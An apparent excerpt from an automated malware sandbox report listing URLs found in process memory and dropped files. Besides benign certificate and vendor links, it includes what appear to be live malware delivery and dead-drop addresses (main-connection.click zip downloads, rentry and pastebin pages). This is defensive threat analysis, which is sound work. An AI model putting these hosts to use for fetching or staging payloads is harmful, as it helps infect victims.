                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                            Source: AUpdate.exe.9.dr, ISCmplr.dll.9.drString found in binary or memory: http://ccsca2021.crl.certum.pl/ccsca2021.crl0s
                            Source: AUpdate.exe.9.dr, ISCmplr.dll.9.drString found in binary or memory: http://ccsca2021.ocsp-certum.com05
                            Source: isscint.dll.9.drString found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
                            Source: isscint.dll.9.drString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
                            Source: AUpdate.exe.9.dr, ISCmplr.dll.9.drString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
                            Source: isscint.dll.9.dr, AUpdate.exe.9.dr, ISCmplr.dll.9.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                            Source: isscint.dll.9.dr, AUpdate.exe.9.dr, ISCmplr.dll.9.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                            Source: isscint.dll.9.drString found in binary or memory: http://cscasha2.ocsp-certum.com04
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1E26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://main-connection.click
                            Source: powershell.exe, 00000001.00000002.1580242544.0000022CC04F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                            Source: isscint.dll.9.dr, AUpdate.exe.9.dr, ISCmplr.dll.9.drString found in binary or memory: http://ocsp.sectigo.com0
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB06AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rentry.org
                            Source: AUpdate.exe.9.dr, ISCmplr.dll.9.drString found in binary or memory: http://repository.certum.pl/ccsca2021.cer0
                            Source: isscint.dll.9.drString found in binary or memory: http://repository.certum.pl/cscasha2.cer0
                            Source: isscint.dll.9.drString found in binary or memory: http://repository.certum.pl/ctnca.cer09
                            Source: AUpdate.exe.9.dr, ISCmplr.dll.9.drString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB096C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB0481000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB096C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: isscint.dll.9.drString found in binary or memory: http://subca.ocsp-certum.com01
                            Source: AUpdate.exe.9.dr, ISCmplr.dll.9.drString found in binary or memory: http://subca.ocsp-certum.com02
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB06AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: isscint.dll.9.dr, AUpdate.exe.9.dr, ISCmplr.dll.9.drString found in binary or memory: http://www.certum.pl/CPS0
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.0000000009881000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004E99000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.0000000005176000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                            Source: powershell.exe, 00000001.00000002.1586741158.0000022CC89E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                            Source: AUpdate.exe, 0000000B.00000000.1554247133.0000000000401000.00000020.00000001.01000000.00000009.sdmp, AUpdate.exe.9.drString found in binary or memory: http://www.remobjects.com/psopenU
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                            Source: MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB0481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB096C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                            Source: MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1D2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB090B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB086A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn4.buysellads.net/pub/rentryorg.js?
                            Source: MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                            Source: MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                            Source: powershell.exe, 00000001.00000002.1580242544.0000022CC04F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 00000001.00000002.1580242544.0000022CC04F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 00000001.00000002.1580242544.0000022CC04F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                            Source: MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                            Source: MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB06AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB228E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB2310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                            Source: powershell.exe, 00000001.00000002.1584358339.0000022CC86F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
                            Source: isscint.dll.9.dr, AUpdate.exe.9.dr, ISCmplr.dll.9.drString found in binary or memory: https://jrsoftware.org/
                            Source: AUpdate.exe, 0000000B.00000000.1554247133.0000000000401000.00000020.00000001.01000000.00000009.sdmp, AUpdate.exe.9.drString found in binary or memory: https://jrsoftware.org/isdonate.phpopenj
                            Source: AUpdate.exe, 0000000B.00000000.1554247133.0000000000401000.00000020.00000001.01000000.00000009.sdmp, AUpdate.exe.9.drString found in binary or memory: https://jrsoftware.org/isinfo.phpopen
                            Source: AUpdate.exe, 0000000B.00000000.1554247133.0000000000401000.00000020.00000001.01000000.00000009.sdmp, AUpdate.exe.9.drString found in binary or memory: https://jrsoftware.org/ismail.phpopenU
                            Source: isscint.dll.9.dr, AUpdate.exe.9.dr, ISCmplr.dll.9.drString found in binary or memory: https://jrsoftware.org0
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB1E26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB090B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://main-connection.click
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB090B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://main-connection.click/Download_StarW3_pack.zip
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB090B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://main-connection.click/Download_StarW3_pack.zip8
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://main-connection.click/archive.
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB086A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://main-connection.click/archive.zip
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1E26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://main-connection.clickp
                            Source: powershell.exe, 00000001.00000002.1580242544.0000022CC04F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: MSBuild.exe, 00000014.00000002.2074279644.0000000003131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/DWCCqGB0
                            Source: MSBuild.exe, 00000014.00000002.2074279644.0000000003131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/DWCCqGB0PO
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1D2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB090B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/0xf6EA7bF5d089F439Ec6e7010101a88579d0Caa862d4EE0
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/0xf6EA7bF5d089F439Ec6e7a131388579d0Caa862d4EE0
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1D2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB090B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/0xf6ea7bf5d089f439ec6e7010101a88579d0caa862d4ee0
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/0xf6ea7bf5d089f439ec6e7a131388579d0caa862d4ee0
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/512.png
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1D2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.o
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB06AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB1CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.org
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1D2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.org/
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB06AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB1CB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB0481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.org/0xf6EA7bF5d089F439Ec6e7010101a88579d0Caa862d4EE0
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB06AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB0481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.org/0xf6EA7bF5d089F439Ec6e7a131388579d0Caa862d4EE0
                            Source: AUpdate.exe.9.dr, ISCmplr.dll.9.drString found in binary or memory: https://sectigo.com/CPS0
                            Source: isscint.dll.9.drString found in binary or memory: https://sectigo.com/CPS0D
                            Source: isscint.dll.9.dr, AUpdate.exe.9.dr, ISCmplr.dll.9.drString found in binary or memory: https://www.certum.pl/CPS0
                            Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                            Source: MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                            Source: MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                            Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1D2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB090B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-LLFSDKZXET
                            Source: powershell.exe, 00000001.00000002.1585418830.0000022CC88C8000.00000004.00000020.00020000.00000000.sdmp, AUpdate.exe, 0000000B.00000000.1554584495.0000000000657000.00000002.00000001.01000000.00000009.sdmp, AUpdate.exe, 0000000B.00000002.1618449030.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp, AUpdate.exe.9.dr, ISCmplr.dll.9.drString found in binary or memory: https://www.innosetup.com
                            Source: AUpdate.exe, 0000000B.00000000.1554247133.0000000000401000.00000020.00000001.01000000.00000009.sdmp, AUpdate.exe.9.drString found in binary or memory: https://www.innosetup.com/
                            Source: AUpdate.exe, 0000000B.00000000.1554247133.0000000000401000.00000020.00000001.01000000.00000009.sdmp, AUpdate.exe.9.drString found in binary or memory: https://www.remobjects.com/ps
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
